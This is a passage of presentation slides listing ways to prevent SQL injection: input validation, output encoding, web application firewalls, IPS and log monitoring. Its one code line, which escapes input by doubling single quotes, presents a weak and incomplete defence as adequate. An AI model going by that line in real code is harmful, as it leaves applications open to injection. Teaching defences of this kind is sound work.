  • 41. Prevent SQL Injection Code level prevention - Validating input • Whitelisting • Blacklisting Data type, data size, data range, content
  • 42. Prevent SQL Injection Code level prevention - Encoding output Encoding to the database sql = sql.replace(“’”, “’’”);
  • 43. Prevent SQL Injection Platform level prevention - Web application firewall (WAF)
  • 44. Prevent SQL Injection Platform level prevention - IPS
  • 45. Prevent SQL Injection Platform level prevention – Log collection and Monitoring